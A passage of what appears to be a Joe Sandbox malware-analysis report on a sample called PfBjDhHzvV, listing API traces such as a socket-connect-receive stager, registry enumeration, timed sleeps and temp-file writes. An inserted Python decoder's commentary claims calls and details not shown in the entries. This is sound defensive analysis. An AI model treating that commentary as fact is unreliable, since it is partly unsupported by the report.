• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: AttributesCloseEnumFileOpenSleepValue
• String ID:
• API String ID: 684116133-0
• Opcode ID: 10104a00b54ad564de0b6a27de6d321beb19ebe73b68444f5afeb5a17522908c
• Instruction ID: 8bb840ca37be70d557486ed97000bbd1a49b70e29ce1305d9f9c54e604c9ee1b
• Opcode Fuzzy Hash: 10104a00b54ad564de0b6a27de6d321beb19ebe73b68444f5afeb5a17522908c
• Instruction Fuzzy Hash: 05218E75E10219EBEF35CB68DC49BE9B778AB58710F1085D8E788A61C0D7F06AD48F90
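The API lines in these entries give every argument as raw hex, so the meaning of a call (which registry hive, which page protection, which socket type) has to be decoded by hand. The following Python script is an added example, not part of the Joe Sandbox report: it parses lines in the report's own "• Name.MODULE(args), ref: ADDR" format and annotates the arguments with the Windows SDK constant names. The sample lines are copied from the entries above; the decoder only covers the APIs that appear in them, and any argument the sandbox left as "?" is carried through as None and left undecoded.

```python
"""Decode the API-call lines of a Joe Sandbox disassembly entry into named Win32 constants.

Added example, not part of the Joe Sandbox report. The sample lines are copied
from the report entries; the constant values are the Windows SDK definitions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line: "• [Part of subcall function ADDR: ]Name.MODULE(arg,...), ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]          # None where the report shows an unresolved "?"
    ref: int                           # call-site address
    notes: List[str] = field(default_factory=list)

# Windows SDK constants needed for the calls in this report
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
              (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
              (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
GMEM = [(0x2, "GMEM_MOVEABLE"), (0x40, "GMEM_ZEROINIT")]
FILE_MAP = [(0x1, "FILE_MAP_COPY"), (0x2, "FILE_MAP_WRITE"), (0x4, "FILE_MAP_READ"),
            (0x20, "FILE_MAP_EXECUTE")]

def _lookup(value, table):
    return table.get(value, hex(value))

def _flags(value, table):
    names = [name for bit, name in table if value & bit]
    unknown = value & ~sum(bit for bit, _ in table)
    if unknown:
        names.append(hex(unknown))
    return "|".join(names) if names else "0"

def _ok(args, *idx):
    """True when every requested argument position was resolved by the sandbox."""
    return all(i < len(args) and args[i] is not None for i in idx)

# Per-API decoders: argument list -> human-readable notes (empty when inputs are unresolved)
DECODERS = {
    "socket": lambda a: [f"af={_lookup(a[0], AF)}", f"type={_lookup(a[1], SOCK_TYPE)}",
                         f"proto={_lookup(a[2], IPPROTO)}"] if _ok(a, 0, 1, 2) else [],
    "recvfrom": lambda a: [f"buflen={a[2]}"] if _ok(a, 2) else [],
    "VirtualProtect": lambda a: [f"addr={a[0]:#x}", f"size={a[1]:#x}",
                                 f"newprot={_lookup(a[2], PAGE_PROT)}"] if _ok(a, 0, 1, 2) else [],
    "RegOpenKeyExA": lambda a: [f"hkey={_lookup(a[0], HKEYS)}",
                                f"access={_flags(a[3], KEY_ACCESS)}"] if _ok(a, 0, 3) else [],
    "Sleep": lambda a: [f"ms={a[0]} ({a[0] / 1000:g} s)"] if _ok(a, 0) else [],
    "GlobalAlloc": lambda a: [f"flags={_flags(a[0], GMEM)}", f"bytes={a[1]}"] if _ok(a, 0, 1) else [],
    "MapViewOfFile": lambda a: [f"access={_flags(a[1], FILE_MAP)}",
                                f"bytes={a[4]}"] if _ok(a, 1, 4) else [],
}

def parse_args(text):
    if not text or not text.strip():
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in text.split(",")]

def decode_trace(text):
    """Parse every API line in `text`; non-API lines (hashes, dump sources) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        call = ApiCall(m["name"], m["module"], parse_args(m["args"]), int(m["ref"], 16))
        call.notes = DECODERS.get(call.name, lambda a: [])(call.args)
        calls.append(call)
    return calls

def summarize(calls):
    return [(f"{c.ref:08X} {c.name}.{c.module} " + " ".join(c.notes)).rstrip() for c in calls]

# Lines copied from the report entries (the "?" marks arguments the sandbox did not resolve).
SAMPLE = """\
• VirtualProtect.KERNEL32(01260000,00001000,00000004,?,00000000), ref: 01317C7F
• socket.WS2_32(00000002,00000002,00000011), ref: 01287203
  • Part of subcall function 0128719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01287374
• GetTickCount.KERNEL32 ref: 012885C1
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01291DD7
• Sleep.KERNEL32(00057E40), ref: 01291EE0
• GlobalAlloc.KERNEL32(00000040,00014000), ref: 01292801
• MapViewOfFile.KERNEL32(000001E8,00000006,00000000,00000000,00015400), ref: 0128C8D1
"""

if __name__ == "__main__":
    for line in summarize(decode_trace(SAMPLE)):
        print(line)
```

Run against the lines above, the decoder shows what the hex hides: socket(2,2,0x11) is an AF_INET/SOCK_DGRAM/IPPROTO_UDP socket with a 0x1000-byte receive buffer, VirtualProtect sets PAGE_READWRITE on the image base before the second call restores it, RegOpenKeyExA opens a key under HKEY_CURRENT_USER with KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS, and the Sleep(0x57E40) in the later entry is a six-minute delay. Calls the report leaves unresolved ("?") get no note rather than a guessed one.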
APIs
• GlobalAlloc.KERNEL32(00000040,00014000), ref: 01292801
  • Part of subcall function 0128C89A: MapViewOfFile.KERNEL32(000001E8,00000006,00000000,00000000,00015400), ref: 0128C8D1
  • Part of subcall function 0128C89A: UnmapViewOfFile.KERNEL32(00000000), ref: 0128C900
• GlobalFree.KERNELBASE(?), ref: 01292849
• Sleep.KERNEL32(00002800), ref: 01292924
• RtlExitUserThread.NTDLL(00000000), ref: 01292947
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
• String ID:
• API String ID: 2983513495-0
• Opcode ID: fd5a8baa8a1fc11274bf652be38c1f3256a9d3034fb2b18e331136161c6c38f2
• Instruction ID: b4cde9f9a19d1e3329e1d51e77274d1c4616a6768e693e2b51412831c23bb331
• Opcode Fuzzy Hash: fd5a8baa8a1fc11274bf652be38c1f3256a9d3034fb2b18e331136161c6c38f2
• Instruction Fuzzy Hash: 5131D670E10205FBEF15DF99ED05BAE77B4BB59720F148228F505A73C4E7B659008B62
APIs
• Sleep.KERNEL32(00001000), ref: 01291EA3
• RtlExitUserThread.NTDLL(00000000), ref: 01291EEA
  • Part of subcall function 01291D8F: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01291DD7
  • Part of subcall function 01291D8F: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01291E14
  • Part of subcall function 01291D8F: RegCloseKey.ADVAPI32(?), ref: 01291E90
• Sleep.KERNEL32(00004E20), ref: 01291EC6
  • Part of subcall function 01291D8F: GetFileAttributesA.KERNEL32(00000000), ref: 01291E3D
  • Part of subcall function 01291D8F: Sleep.KERNEL32(00000100), ref: 01291E73
• Sleep.KERNEL32(00057E40), ref: 01291EE0
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3734488975-0
APIs
• CloseHandle.KERNEL32(00000000), ref: 012924BB
• CloseHandle.KERNEL32(?), ref: 012924DB
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 012924F3
• HeapFree.KERNEL32(00000000), ref: 012924FA
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CloseHandleHeap$FreeProcess
• String ID:
• API String ID: 4176491614-0
APIs
• WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,3A050002,D12A19BD,0000000A,?,?,5F327377,00003233), ref: 04FD019D
• connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 04FD01A9
• recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 04FD01C4
Memory Dump Source
• Source File: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fd0000_PfBjDhHzvV.jbxd
Yara matches
Similarity
• API ID: Socketconnectrecv
• String ID:
• API String ID: 1489331942-0
APIs
• lstrcpy.KERNEL32(00000000,01282100), ref: 01291D3C
• GetDriveTypeA.KERNEL32(00000000), ref: 01291D55
• RtlExitUserThread.NTDLL(00000000), ref: 01291D80
  • Part of subcall function 01291060: Sleep.KERNEL32(?,?), ref: 012910BF
  • Part of subcall function 01291060: lstrcat.KERNEL32(?,01283D20), ref: 012910DD
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: DriveExitSleepThreadTypeUserlstrcatlstrcpy
• String ID:
• API String ID: 3899959655-0
APIs
• RtlEnterCriticalSection.NTDLL(01299030), ref: 012841D6
• CloseHandle.KERNEL32(00000000), ref: 01284247
• RtlLeaveCriticalSection.NTDLL(01299030), ref: 01284260
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CriticalSection$CloseEnterHandleLeave
• String ID:
• API String ID: 2394387412-0
APIs
• WaitForSingleObject.KERNEL32(?,00000064), ref: 012842B3
• Sleep.KERNEL32(00004E20), ref: 012842D4
• RtlExitUserThread.NTDLL(00000000), ref: 012842DE
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: ExitObjectSingleSleepThreadUserWait
• String ID:
• API String ID: 295063474-0
APIs
  • Part of subcall function 0128A75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 0128A78C
  • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000), ref: 0128A796
  • Part of subcall function 0128A75A: lstrcat.KERNEL32(00000000,01283CC0), ref: 0128A7B2
  • Part of subcall function 0128A75A: lstrcpy.KERNEL32(00000000,00000000), ref: 0128A7CF
  • Part of subcall function 0128A75A: lstrlen.KERNEL32(00000000,01282880,00000000), ref: 0128A7FD
  • Part of subcall function 0128A75A: wsprintfA.USER32 ref: 0128A809
• CreateFileA.KERNEL32(0129382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0129382E), ref: 0129302B
• WriteFile.KERNEL32(000000FF,012626B0,00000401,00000000,00000000), ref: 0129304E
• CloseHandle.KERNEL32(000000FF), ref: 01293058
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Filelstrlen$CloseCreateHandlePathTempWritelstrcatlstrcpywsprintf
• String ID:
• API String ID: 817978534-0
APIs
• GlobalFree.KERNEL32(00000000), ref: 012908E2
• RtlLeaveCriticalSection.NTDLL(01299018), ref: 012908F4
• Sleep.KERNEL32(00000400), ref: 0129090F
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CriticalFreeGlobalLeaveSectionSleep
• String ID:
• API String ID: 2599486065-0
APIs
• IsBadWritePtr.KERNEL32(00000110,00000000), ref: 01288B3E
• Sleep.KERNEL32(00001770), ref: 01288B8E
• Sleep.KERNEL32(0001D4C0), ref: 01288BB0
• lstrcpy.KERNEL32(?,?), ref: 01288CD2
• Sleep.KERNEL32(004B001E), ref: 01288D9D
• Sleep.KERNEL32(001B7740), ref: 01288DAA
• RtlExitUserThread.NTDLL(00000000), ref: 01288DD0
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Sleep$ExitThreadUserWritelstrcpy
• String ID:
• API String ID: 3664100127-0
APIs
• CreateMutexA.KERNEL32(00000000,00000000,?), ref: 05B307EB
• Sleep.KERNEL32(00002710), ref: 05B3080E
Memory Dump Source
• Source File: 00000000.00000002.2249113471.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5b30000_PfBjDhHzvV.jbxd
Similarity
• API ID: CreateMutexSleep
• String ID:
• API String ID: 1464230837-0
APIs
• MapViewOfFile.KERNEL32(000001E8,00000006,00000000,00000000,00015400), ref: 0128C8D1
• UnmapViewOfFile.KERNEL32(00000000), ref: 0128C900
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: FileView$Unmap
• String ID:
• API String ID: 3282598733-0
                                                                                                                                                                                                                                    • Opcode ID: 94e77407847ad8f856c9628625c4f4ebea15f58a40049505120eaf33f9ffa58b
                                                                                                                                                                                                                                    • Instruction ID: bcdd318ef3e4fa81127e21d22f4713d0e8d524bbeff9f5b2fb2bcc3e9134230d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94e77407847ad8f856c9628625c4f4ebea15f58a40049505120eaf33f9ffa58b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43F04F74E00708FBDB20DF98D949BED7BB8A744315F204195FA056B2C4D3B566A4CB54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(00000003,00000020), ref: 0128A295
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000003), ref: 0128A29F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AttributesDelete
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2910425767-0
                                                                                                                                                                                                                                    • Opcode ID: cedf68a26ed5679c272f2d462f339c6520a2f9f6313890cb499e2beca682d99e
                                                                                                                                                                                                                                    • Instruction ID: 4b55171dc15ed8ddd5acca1bffffbed29e996aea07ba5b52140b42927c8d6a31
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cedf68a26ed5679c272f2d462f339c6520a2f9f6313890cb499e2beca682d99e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32E09270231328BBEB207A60D80AB7637586B44600F008102FA0A8B1C9E9F6F5608B80
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,01282104), ref: 012862A8
                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(000001EC,00000006,00000000,00000000,00008000), ref: 012862CE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CreateMappingView
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3452162329-0
                                                                                                                                                                                                                                    • Opcode ID: c1605805ae9f2938bb7060349b9d3da6b61b8ac505ec39f967c36cdb08e2d77b
                                                                                                                                                                                                                                    • Instruction ID: 38c97cb11ad85b463579fb6c33ccf621ca9c162b23a3cba9f43643005664225e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1605805ae9f2938bb7060349b9d3da6b61b8ac505ec39f967c36cdb08e2d77b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F0A574281300ABFB309B58FD4EB5537A8B344B38F20820DFB255A2D8C7B624D8CB54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseFindSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1358061995-0
                                                                                                                                                                                                                                    • Opcode ID: d2be57a4a7ff4bd43d29c59855e722db78269e3084de1171d332e0caa0f9abc4
                                                                                                                                                                                                                                    • Instruction ID: 38f85d81a26db32a1aae3bc70cca96189ee588b623b1a404934644e7db981dba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2be57a4a7ff4bd43d29c59855e722db78269e3084de1171d332e0caa0f9abc4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5E08C7AA00209CFCF20CF98E8497ADB770FB8C322F108369DA15A32C0C7391421CBA0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0001F200), ref: 012937F4
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: CreateFileA.KERNEL32(0129382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0129382E), ref: 0129302B
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: WriteFile.KERNEL32(000000FF,012626B0,00000401,00000000,00000000), ref: 0129304E
                                                                                                                                                                                                                                      • Part of subcall function 01292FFF: CloseHandle.KERNEL32(000000FF), ref: 01293058
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 01293852
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AllocCloseCreateGlobalHandleSleepWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 653111876-0
                                                                                                                                                                                                                                    • Opcode ID: 7e900ad23adb76f9f4c1eaf6fc33fd41ae9cd20a76dbe79cc345c30aa4bbcaca
                                                                                                                                                                                                                                    • Instruction ID: 4e07e1fefad91927d20dfc11edbddc706514ec1a6f4cd10494ec6ffe9abf6513
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e900ad23adb76f9f4c1eaf6fc33fd41ae9cd20a76dbe79cc345c30aa4bbcaca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF419AB2920154ABDB24D768DC51BE973B9BB68300F0045E5E74DA7280DBB56F84CF91
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285983
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01285AF0
